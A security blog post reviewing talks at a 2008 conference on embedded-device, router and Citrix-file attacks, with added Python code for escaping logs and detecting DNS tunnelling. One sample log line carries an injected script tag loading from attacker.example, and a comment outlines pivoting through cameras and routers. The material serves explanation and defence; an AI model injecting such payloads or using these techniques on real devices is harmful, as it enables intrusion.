Dan Griffin's Blog
Comments on security, PKI, smart cards, cryptography, and entrepreneurship.
Confidence - 2nd day review
May 19, 2008
I’m sitting in the Krakow airport, waiting for my return flight via Chicago, very tired, but also very glad I came. Foremost, I met new colleagues and made great connections at Confidence. And I learned a lot. Can’t wait for next year!
The second day of the conference (Saturday) started with Adrian Pastor’s (http://www.gnucitizen.org/about/ap/) discussion on embedded device hacking. His first demo consisted of injecting an XSS link into the administrative log of an Axis 2100 web camera. Assuming you can get the admin to look at the log, it’ll run your script on the camera, which supports both ‘mish’ (a minimal shell) and PHP.
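The log-injection demo hinges on one detail: the web UI writes log entries into the page as raw HTML, so whatever an attacker manages to get logged is parsed as markup when the administrator opens the viewer. The following is an added illustration in Python, not code from the talk or from any Axis firmware, using constructed log lines. It places the vulnerable renderer next to an escaped one and adds a check that flags entries containing markup, so tampering attempts can be alerted on even after the rendering bug is fixed.

```python
import html
import re

# Constructed sample log entries (not taken from any real device); the second
# one carries the kind of payload a log-injection attempt would leave behind.
SAMPLE_LOG = [
    "2008-05-17 10:02:11 admin login from 192.0.2.10",
    "2008-05-17 10:05:43 failed login user=\"<script src='http://attacker.example/x.js'></script>\"",
    "2008-05-17 10:07:00 config saved",
]


def render_log_vulnerable(entries):
    """Concatenate raw entries into HTML: attacker-controlled text becomes markup."""
    return "<ul>" + "".join(f"<li>{e}</li>" for e in entries) + "</ul>"


def render_log_safe(entries):
    """Escape every entry so the browser shows it as text and never parses it as HTML."""
    return "<ul>" + "".join(f"<li>{html.escape(e, quote=True)}</li>" for e in entries) + "</ul>"


# Tag openings, javascript: URLs and inline event handlers have no business in a log line.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z]|javascript\s*:|on[a-z]+\s*=", re.IGNORECASE)


def flag_suspicious_entries(entries):
    """Return (index, entry) pairs whose text contains HTML/script markup.

    Useful as a monitoring rule: a log that suddenly contains markup is a
    tampering attempt worth investigating regardless of how it is rendered.
    """
    return [(i, e) for i, e in enumerate(entries) if MARKUP_RE.search(e)]


def contains_active_markup(rendered_html):
    """True if the rendered page still contains a live <script> tag."""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    print("vulnerable page executes script:", contains_active_markup(render_log_vulnerable(SAMPLE_LOG)))
    print("escaped page executes script:   ", contains_active_markup(render_log_safe(SAMPLE_LOG)))
    print("flagged entries:", flag_suspicious_entries(SAMPLE_LOG))
```

Escaping at output time (the `html.escape` call) is the actual fix; the regex check is a detection aid and deliberately generous, so treat its hits as alerts to review rather than as a filter to rely on.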
Adrian has also spent a lot of time hacking British Telecom’s home broadband routers (see the site referenced above). I have no doubt that he’s made some great friends at that company.
[Update - the plane from Krakow loaded faster than I thought, and then I went to sleep, so now it's Monday and I'm back in Seattle.]
Other attacks:
- Using embedded devices, when not segmented, as a stepping stone for JavaScript-based network scanning
- Stealing password files from embedded devices. For example, many store plaintext passwords, and some are susceptible to pre-authentication attacks, especially via whatever CGIs they may expose.
Petko Petkov (http://www.gnucitizen.org/author/pdp/) was next on the Saturday conference speaker list. Highlights:
- UPnP fun. If you can get a DSL router to run your script, then you can probably reconfigure it and other devices on that network via UPnP. For example, set up a port forwarding rule for all incoming email …
- Lack of filtering for RDP (as in, Microsoft Terminal Server connection shortcuts) and Citrix files. The latter is particularly nasty: an attacker can send a victim a Citrix connection file which, when run, automatically connects to a remote system, runs a program, then disconnects. The user will have no idea what just happened (delete files, open a port, whatever).
Dinis Cruz (http://blogs.owasp.org/diniscruz/) was up next, and demonstrated a custom scriptable front-end he wrote (called F1) for Ounce Lab’s source code scanning product. F1, written in C#, is like an IDE on steroids. One of the panels uses the GLEE graphing/flow-chart control, for example, which looks totally cool. I hope he’ll post more information about his work; perhaps we’ll see it when the Confidence slides go up.
After Dinis came lunch. After lunch, the weather was so nice that I pretty much just sat around and conversed with attendees outside for the rest of the day. Very relaxing!
One highlight I neglected to mention from the first day - Alberto Revelli presented his Sqlninja (http://sqlninja.sourceforge.net/) tool, which does some cool things, including the “DNS tunneled pseudo-shell”.
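Sqlninja's DNS-tunneled pseudo-shell moves command output out through DNS queries, which is exactly the traffic most networks let through unfiltered. As an added example (my own code, not part of Sqlninja or of this post), here is a small Python detector run over constructed resolver log lines in an assumed "timestamp client qtype qname" format. It scores each query on subdomain length, character entropy and a tunnel-friendly record type, and only reports a client/domain pair when several queries trip at least two signals, because any single heuristic fires on legitimate CDN names.

```python
import math
from collections import Counter, defaultdict

# Constructed DNS query log lines (not from any real resolver). Format assumed:
# "<unix_ts> <client_ip> <qtype> <qname>". The three example.net queries mimic
# a tunnel: long, random-looking labels in TXT lookups from one client.
SAMPLE_QUERIES = [
    "1211201000 10.0.0.5 A www.example.com",
    "1211201001 10.0.0.5 A mail.example.com",
    "1211201002 10.0.0.7 TXT 0f1e2d3c4b5a6978.89a7b6c5d4e3f201.1b3d5f79.tunnel.example.net",
    "1211201003 10.0.0.7 TXT fedcba9876543210.02468ace13579bdf.a0b1c2d3.tunnel.example.net",
    "1211201004 10.0.0.7 TXT 13579bdf02468ace.a5b4c3d2e1f09876.f0e1d2c3.tunnel.example.net",
    "1211201005 10.0.0.5 A a1.static-assets.cdn-provider.example.com",
    "1211201006 10.0.0.5 A cdn.example.org",
]


def shannon_entropy(s):
    """Bits per character; hex/base32 payloads sit near 4-5, ordinary hostnames far lower."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def base_domain(qname):
    # Last two labels; a production rule would consult the public suffix list.
    return ".".join(qname.rstrip(".").split(".")[-2:])


def subdomain_part(qname):
    return ".".join(qname.rstrip(".").split(".")[:-2])


def parse(line):
    ts, client, qtype, qname = line.split()
    return {"ts": int(ts), "client": client, "qtype": qtype.upper(), "qname": qname.lower()}


def score_query(q, max_sub_len=40, min_entropy=3.5):
    """Return the list of tunnel indicators this single query trips."""
    sub = subdomain_part(q["qname"])
    reasons = []
    if len(sub) > max_sub_len:
        reasons.append("long_subdomain")
    if shannon_entropy(sub.replace(".", "")) > min_entropy:
        reasons.append("high_entropy")
    if q["qtype"] in ("TXT", "NULL", "CNAME"):
        reasons.append("tunnel_friendly_qtype")
    return reasons


def detect_tunnels(lines, min_reasons=2, min_hits=2):
    """Group suspicious queries by (client, base domain); report pairs seen repeatedly."""
    hits = defaultdict(list)
    for line in lines:
        q = parse(line)
        if len(score_query(q)) >= min_reasons:
            hits[(q["client"], base_domain(q["qname"]))].append(q["qname"])
    return {key: names for key, names in hits.items() if len(names) >= min_hits}


if __name__ == "__main__":
    for (client, domain), names in detect_tunnels(SAMPLE_QUERIES).items():
        print(f"{client} -> {domain}: {len(names)} tunnel-like queries")
```

The CDN-style name in the sample is there on purpose: its hyphenated labels score above the entropy threshold on their own, but it is an A query of normal length, so it never reaches the two-signal bar. Tune the thresholds against a baseline of your own resolver logs before alerting on the output.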
Just a note regarding using an Internet-facing (unsegmented) embedded device as a stepping stone to probe the LAN: you don’t need JavaScript to do this. Most embedded devices have built-in functionalities for accurate port-scanning, ping sweeping and even vulnerability scanning.
Examples:
- ping diagnostic tool: can be wrapped around with a script run by the attacker (i.e.: bash) which loops through RFC1918 IP addresses in order to discover live internal hosts
- DHCP client list: if the target is an Internet gateway, such a feature would return MAC addresses and IP addresses of those clients that are connected via automatic network settings (NOT static IP configuration)
- port-forwarding rules: allows you to expose ports from internal machines directly to the Internet
- built-in scripting environments and/or dynamic server-side languages. A good example is Axis IP cameras with Mish and PHP support. For instance, you can port a web vulnerability scanner to Mish which you ultimately run via the camera’s telnet interface.
Finally, to be precise, the video stream replacement exploit combines 2 persistent XSS vulnerabilities with a forged request (CSRF).
Comment by Adrian Pastor — May 19, 2008 @ 5:25 pm